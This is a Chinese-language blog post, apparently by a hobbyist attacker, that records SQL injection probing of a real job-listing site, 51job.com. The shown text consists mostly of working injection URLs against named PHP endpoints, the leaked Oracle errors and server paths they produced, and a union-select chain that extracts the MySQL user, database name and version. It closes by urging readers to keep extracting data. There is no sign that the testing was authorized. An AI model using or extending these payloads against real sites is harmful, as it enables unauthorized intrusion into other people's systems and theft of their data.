http://hi.baidu.com/tjannock/blog/item/01d0aa2b1f7f0cf9e7cd4020.html
今日学校有http://my.51job.com 的传单,于是上了一下他的网站.
点投票,发现存在php注入
http://my.51job.com/investigate/ShowResult.php?Subject=%C4%E3%C8%CF%CE%AA%B5%BD%C6%F3%D2%B5%CA%B5%CF%B0%B4%F8%B8%F8%C4%E3%D7%EE%D6%D8%D2%AA%B5%C4%D2%BB%B5%E3%CA%C7%CA%B2%C3%B4%A3%BF&Type=7001 '
ORA-00933: SQL command not properly ended
Query :"select * from log_action where type=7001'' and selval!=0 order by selval asc"
加双引号还暴出路径
http://my.51job.com/investigate/ShowResult.php?Subject=%C4%E3%C8%CF%CE%AA%B5%BD%C6%F3%D2%B5%CA%B5%CF%B0%B4%F8%B8%F8%C4%E3%D7%EE%D6%D8%D2%AA%B5%C4%D2%BB%B5%E3%CA%C7%CA%B2%C3%B4%A3%BF&Type=7001 "
Warning: OCIParse: ORA-01740: missing double quote in identifier in /var/www/inc/co/news/news_oci8.class.php on line 69
Warning: Supplied argument is not a valid OCI8-Statement resource in /var/www/inc/co/news/news_oci8.class.php on line 92
可惜权限不太 只能像asp 的Access 注入一样猜表.
http://my.51job.com/investigate/ShowResult.php?Subject=%C4%E3%C8%CF%CE%AA%B5%BD%C6%F3%D2%B5%CA%B5%CF%B0%B4%F8%B8%F8%C4%E3%D7%EE%D6%D8%D2%AA%B5%C4%D2%BB%B5%E3%CA%C7%CA%B2%C3%B4%A3%BF&Type=7001 and exists(select * from log_action)
反回正常. 当然and exists(select * from log_action) log_action这个表是存在的.哈哈.
再看一下其它页面.
http://my.51job.com/investigate/ShowInvestList.php?typelike=07'
ORA-00933: SQL command not properly ended
Query :"select id,type,subject,forum_id,msg_id,class_id,recommend from log_action where class_id=07'' and selval=0 order by
原来到处都存在漏洞...晕
-------------------------------------------------------------------------------------------------------------------
新发现.漏洞还真多
页面下面的ad连接
http://ac.51job.com/phpAD/adtrace.php?ID=10775340
正常转向
但
http://ac.51job.com/phpAD/adtrace.php?ID=10775340'
不能正常转向
http://ac.51job.com/phpAD/adtrace.php?ID=10775340 and 1=1 正常
http://ac.51job.com/phpAD/adtrace.php?ID=10775340 and 1=2 不正常
http://ac.51job.com/phpAD/adtrace.php?ID=10775340 order by 4 不正常
http://ac.51job.com/phpAD/adtrace.php?ID=10775340 order by 3 正常
http://ac.51job.com/phpAD/adtrace.php?ID=10775340 and 1=2 union select 1,2,3 返回
http://companyadc.51job.com/1
若 http://ac.51job.com/phpAD/adtrace.php?ID=10775340 and 1=2 union select user(),2,3
http://companyadc.51job.com/jobs@localhost
http://ac.51job.com/phpAD/adtrace.php?ID=10775340 and 1=2 union select database(),2,3
http://companyadc.51job.com/jobs
http://ac.51job.com/phpAD/adtrace.php?ID=10775340 and 1=2 union select version(),2,3
http://companyadc.51job.com/5.0.26-standard-log
哈哈....
如果谁还有兴趣猜下去的就继续............go |